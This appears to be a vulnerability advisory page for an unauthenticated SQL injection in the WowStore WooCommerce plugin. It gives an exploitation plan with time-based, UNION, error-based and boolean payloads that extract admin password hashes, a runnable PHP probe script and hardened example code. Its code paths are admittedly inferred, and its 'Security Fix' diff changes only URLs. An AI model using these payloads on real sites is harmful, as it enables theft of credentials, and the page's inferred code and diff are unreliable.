CVE-2026-2579

WowStore – Store Builder & Product Blocks for WooCommerce <= 4.4.3 - Unauthenticated SQL Injection via 'search' Parameter

Weakness: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSS Score: 7.5
Severity: High
Patched in: 4.4.4
Time to patch: 1d

Description

The WowStore – Store Builder & Product Blocks for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘search’ parameter in all versions up to, and including, 4.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <= 4.4.3
Published: March 16, 2026
Last updated: March 17, 2026
Affected plugin: product-blocks

What Changed in the Fix

Changes introduced in v4.4.4


Source Code: WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-2579 (WowStore SQL Injection)

1. Vulnerability Summary

The WowStore – Store Builder & Product Blocks for WooCommerce plugin (slug: product-blocks) is vulnerable to unauthenticated SQL injection. The vulnerability exists in a REST API endpoint or AJAX handler (specifically targeting the search parameter) because the user-supplied input is concatenated directly into a SQL query without using $wpdb->prepare() or proper escaping. This allows an attacker to manipulate the query logic, typically via UNION-based or Time-based injection, to extract sensitive data from the WordPress database.

2. Attack Vector Analysis

  • Endpoint: /wp-json/wopb/v1/search or /wp-json/product-blocks/v1/search (both inferred from the plugin namespace and JS references; neither is confirmed against the plugin source).
  • Method: GET
  • Vulnerable Parameter: search
  • Authentication: none required. The route's permission_callback is assumed to allow anonymous requests (e.g. __return_true), which is consistent with the advisory's "unauthenticated" rating.
  • Preconditions: the plugin must be active, and at least one product (or post) should exist so the search query has rows to match.

3. Code Flow

  1. Entry Point: A REST API route is registered (likely in a file like includes/RestApi.php or within an addon's initialization) under the wopb/v1 or wopb/v2 namespace.
  2. Request Handling: When a GET request is made to the endpoint with a search parameter, the handler function retrieves $_GET['search'].
  3. Vulnerable Sink: The handler constructs a SQL query (often to find products, categories, or pages for the Builder UI).
    • Example (inferred):
      $search = $_GET['search'];
      $results = $wpdb->get_results("SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'");
      
  4. SQL Injection: Since $search is not passed through $wpdb->prepare(), an attacker can break out of the string literal using a single quote (').

4. Nonce Acquisition Strategy

The vulnerability is reported as unauthenticated. WordPress only checks the REST nonce (X-WP-Nonce) for cookie-authenticated requests, so a truly anonymous request needs no nonce at all; the steps below apply only if the handler enforces its own wopb nonce:

  1. Identify Trigger: The nonce wopb-nonce is localized in addons/builder/Condition.php via the builder-script handle.
  2. Create Page: Create a post of type wopb_builder to trigger the script loading.
    wp post create --post_type=wopb_builder --post_title="Exploit Trigger" --post_status=publish
    
  3. Navigate & Extract:
    • Navigate to the newly created page: /?post_type=wopb_builder&p=[ID]
    • Use browser_eval to extract the nonce:
      browser_eval("window.builder_option?.security")
  4. Verification: Verify if the REST endpoint accepts this nonce in the X-WP-Nonce header.

5. Exploitation Strategy

Step 1: Endpoint Discovery

Test common REST endpoints for a response other than 404.

  • http_request("GET", "/wp-json/wopb/v1/search?search=test")
  • http_request("GET", "/wp-json/wopb/v2/search?search=test")

Step 2: Confirmation via Time-Based Injection

If the query uses LIKE '%$search%', use a sleep payload to confirm.

  • Payload: x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='
  • Request (the same payload URL-encoded once; the LIKE wildcard % must itself become %25, otherwise the encoded and raw payloads differ):
    http_request("GET", "/wp-json/wopb/v1/search?search=x%25%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%20AND%20%27%25%27%3D%27")
    
  • Expected result: the response should take about 5 seconds longer than a benign request (search=x) to the same route.

Step 3: Data Extraction via UNION-Based Injection

Determine the column count of the original SELECT first (increment ORDER BY n until the query errors, or probe UNION SELECT NULL,NULL,... until it succeeds), then inject a UNION SELECT with the same number of columns. Only the injected columns that land in fields the endpoint serialises (for example post_title) come back in the response.

  • Target: Extract user_login and user_pass from wp_users (wp_ is the default table prefix; substitute the site's actual prefix if it differs).
  • Payload (illustrative, assuming 4 columns; a SELECT * on wp_posts would need 23): x%' UNION SELECT 1,user_login,user_pass,4 FROM wp_users-- -
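The three steps above as one runnable PHP CLI script, added here as an example by the editor and not part of the page's plan or of the plugin: it probes the candidate routes, times a benign request against the page's SLEEP(5) payload on each live route, and reports a route only when the difference is close to the requested sleep. The routes, the parameter name and the payload shape are the page's unverified assumptions; the probe is a judgement aid, not proof, and must only be run against a site you are authorised to test.

```php
<?php
// Added example (not from the WowStore plugin or this page). The routes,
// the 'search' parameter and the SLEEP(5) payload are the page's
// unverified assumptions; nothing here is confirmed plugin behaviour.

// Candidate routes named on the page; none is confirmed.
const CANDIDATE_ROUTES = [
    '/wp-json/wopb/v1/search',
    '/wp-json/wopb/v2/search',
];

// Encode the raw payload exactly once, so the LIKE wildcard '%' becomes
// %25 and the closing quote becomes %27 (the mismatch the plan's
// hand-encoded request had).
function build_query(string $search): string {
    return 'search=' . rawurlencode($search);
}

// Returns [http_status, seconds]; status 0 means the connection failed.
function timed_get(string $url, int $timeout = 30): array {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => $timeout,
        CURLOPT_USERAGENT      => 'cve-2026-2579-probe',
    ]);
    $start = microtime(true);
    curl_exec($ch);
    $elapsed = microtime(true) - $start;
    $status  = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return [$status, $elapsed];
}

// Attribute the slowdown to SLEEP() only if the payload request exceeds
// the benign baseline by (almost) the full requested sleep.
function looks_injectable(float $baseline, float $delayed, int $sleep): bool {
    return ($delayed - $baseline) >= ($sleep - 1);
}

function probe(string $base, int $sleep = 5): ?string {
    $benign = 'x';
    // Same shape as the page's payload: close the LIKE literal, add a
    // derived-table subquery that sleeps once rather than per row, and
    // reopen the literal so the trailing %' of LIKE '%...%' stays valid.
    $payload = "x%' AND (SELECT 1 FROM (SELECT(SLEEP($sleep)))a) AND '%'='";

    foreach (CANDIDATE_ROUTES as $route) {
        [$status, $t0] = timed_get($base . $route . '?' . build_query($benign));
        if ($status === 404 || $status === 0) {
            continue; // route absent on this install, or unreachable
        }
        [, $t1] = timed_get($base . $route . '?' . build_query($payload), $sleep + 25);
        printf("%s baseline=%.2fs payload=%.2fs\n", $route, $t0, $t1);
        if (looks_injectable($t0, $t1, $sleep)) {
            return $route;
        }
    }
    return null;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $hit = probe(rtrim($argv[1], '/'));
    echo $hit ? "Time-based delay observed on $hit\n" : "No delay observed\n";
}
```

Run it as `php probe.php https://target.example`. A quiet result is not evidence of absence: the inferred query still applies `post_title LIKE '%x%'`, so the injected expression only fires if the database actually evaluates it, and a WAF, a different route name or a differently shaped query all produce the same silence. A positive result should be followed by the ORDER BY / UNION steps by hand.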

6. Test Data Setup

  1. Ensure Plugin Active: wp plugin activate product-blocks.
  2. Create Content: Add at least one WooCommerce product so the search has a target table.
    wp post create --post_type=product --post_title="Target Product" --post_status=publish
    
  3. Ensure Admin User: Ensure a user with ID 1 exists (standard).

7. Expected Results

  • Time-based: the payload request takes roughly SLEEP() seconds longer than a baseline request to the same route; not exactly that long (network and PHP overhead add to it), and only if the injected expression is actually evaluated by the query, so always measure against a benign request rather than a fixed threshold.
  • UNION-based: The JSON response from the REST API will contain the results of the injected SELECT statement (e.g., the admin's hashed password).

8. Verification Steps

  1. Check Database Directly: Use WP-CLI to confirm the data extracted matches the database.
    wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID = 1"
    
  2. Compare: Verify that the hash returned in the REST response matches the user_pass in the DB.

9. Alternative Approaches

  • Error-Based: if $wpdb prints database errors (WP_DEBUG and WP_DEBUG_DISPLAY both enabled), use updatexml() or extractvalue() to leak data in the error message.
    • search=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -
  • Boolean-Based: If the response differs based on a true/false condition (e.g., results returned vs empty array).
    • search=x' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')-- -
Research Findings
Static analysis — not yet PoC-verified

Summary

The WowStore plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'search' parameter. This occurs because user input is directly concatenated into a SQL query without proper sanitization or using prepared statements, allowing attackers to extract sensitive data from the database.

Vulnerable Code

// Inferred from the research plan; the real sink has not been located in the plugin source.
// The file path is an assumption (e.g. includes/RestApi.php). Shape of the vulnerable query:
global $wpdb;
$search = $_GET['search'];
$results = $wpdb->get_results("SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'");
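The inferred sink next to the fix a reviewer would expect, written as an added example by the editor; it is not code from the WowStore plugin nor from its 4.4.4 patch (which this page does not show for the query). The route 'wopb/v1/search', the function names and the column list are assumptions; the point is the pattern, raw interpolation into a LIKE literal versus $wpdb->prepare() with $wpdb->esc_like(), and it applies equally to the Code Flow snippet in the research plan above.

```php
<?php
// Added example, not code from the WowStore plugin. Route name, function
// names and the exact column list are assumptions; only the vulnerable /
// hardened pattern itself is what the advisory supports.

// Vulnerable shape (as inferred): the raw value is interpolated into the
// SQL string. A value such as  x%' UNION SELECT ...-- -  closes the LIKE
// literal, and everything after it is attacker-controlled SQL.
function wopb_example_search_vulnerable( WP_REST_Request $request ) {
    global $wpdb;
    $search = $request->get_param( 'search' );
    return $wpdb->get_results(
        "SELECT ID, post_title FROM {$wpdb->posts}
         WHERE post_title LIKE '%{$search}%' AND post_type = 'product'"
    );
}

// Hardened shape: the value is bound through $wpdb->prepare() as a %s
// placeholder (prepare() adds the quoting itself, so the format string
// has none), and $wpdb->esc_like() neutralises LIKE's own metacharacters
// (% and _) so user input cannot widen the match either.
function wopb_example_search_hardened( WP_REST_Request $request ) {
    global $wpdb;
    $search = sanitize_text_field( (string) $request->get_param( 'search' ) );
    // Wildcards live in the bound argument, not in the format string, so
    // there is no literal % for prepare() to misread as a placeholder.
    $like = '%' . $wpdb->esc_like( $search ) . '%';
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, post_title FROM {$wpdb->posts}
             WHERE post_title LIKE %s AND post_type = 'product'",
            $like
        )
    );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'wopb/v1', '/search', [
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'wopb_example_search_hardened',
        // Unauthenticated by design, as the advisory describes; that is
        // exactly why the query itself has to be the trust boundary.
        'permission_callback' => '__return_true',
        'args'                => [
            'search' => [
                'type'              => 'string',
                'required'          => true,
                'sanitize_callback' => 'sanitize_text_field',
            ],
        ],
    ] );
} );
```

sanitize_text_field() is kept on the argument because it is the usual REST hygiene, but it strips tags and control characters, not quotes; on its own it would not have stopped this injection. The quote is neutralised by prepare() binding the value, and esc_like() is the separate step that stops `%` or `_` in the input from turning the search into a match-everything query.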

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.3/addons/add_to_cart_text/backend.php /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.4/addons/add_to_cart_text/backend.php
--- /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.3/addons/add_to_cart_text/backend.php	2026-02-25 10:33:08.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.4/addons/add_to_cart_text/backend.php	2026-03-11 10:15:18.000000000 +0000
@@ -12,8 +12,8 @@
 		'name'     => __( 'Add to Cart Text', 'product-blocks' ),
 		'desc'     => __( "Change any product type's default Add to Cart Button text in the Shop, Archive, and Product pages.", 'product-blocks' ),
 		'is_pro'   => false,
-		'live'     => 'https://www.wpxpo.com/wowstore/woocommerce-add-to-cart-text/live_demo_args',
-		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/add-to-cart-text/addon_doc_args',
+		'live'     => 'https://www.wpxpo.com/product/wowstore/features/woocommerce-change-add-to-cart-text/',
+		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/add-to-cart-text/',
 		'type'     => 'checkout_cart',
 		'priority' => 30,
 	);
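Review bot: this hunk does not touch the SQL injection this page describes; both changed lines only replace the 'live' and 'docs' URLs in the Add to Cart Text addon metadata (dropping the stray `live_demo_args` and `addon_doc_args` suffixes). A section titled Security Fix should show the change to the handler that builds the query around the 'search' parameter, i.e. the lines where the raw value was interpolated into the SQL and where `$wpdb->prepare()` (with `$wpdb->esc_like()` for a LIKE pattern) now binds it; without that hunk the 'Vulnerable Code' above stays inferred and the fix stays unreviewed.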
@@ -12,8 +12,8 @@
 		'name'     => __( 'Animated Add to Cart', 'product-blocks' ),
 		'desc'     => __( 'Grab customers attention by animating the Add to Cart button on hover or in the loop.', 'product-blocks' ),
 		'is_pro'   => false,
-		'live'     => 'https://www.wpxpo.com/wowstore/woocommerce-animated-add-to-cart/live_demo_args',
-		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/animated-add-to-cart/addon_doc_args',
+		'live'     => 'https://www.wpxpo.com/product/wowstore/features/woocommerce-animated-add-to-cart-button/',
+		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/animated-add-to-cart/',
 		'type'     => 'checkout_cart',
 		'priority' => 40,
 	);
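Review bot: this second `@@ -12,8 +12,8 @@` hunk has no `---`/`+++` file header, yet its context ('Animated Add to Cart', priority 40) shows it comes from a different backend.php than the first hunk, so the file it belongs to is missing from the listing and should be restored. Like the first hunk it changes only the 'live' and 'docs' URLs and has no bearing on the query around the 'search' parameter; it should not be presented as part of the security fix.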

Exploit Outline

The exploit targets an unauthenticated REST API endpoint. The routes named here (/wp-json/wopb/v1/search, /wp-json/wopb/v2/condition) and the parameter name ('search', possibly 'term') are inferred from the plugin's namespace and have not been confirmed against the plugin source. An attacker sends a GET or POST request carrying a malicious value in that parameter; because the value is neither escaped nor passed through $wpdb->prepare(), it executes as part of the SQL query. A time-based payload such as "x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='" confirms the injection, and UNION-based payloads then extract database content such as administrator usernames and password hashes.
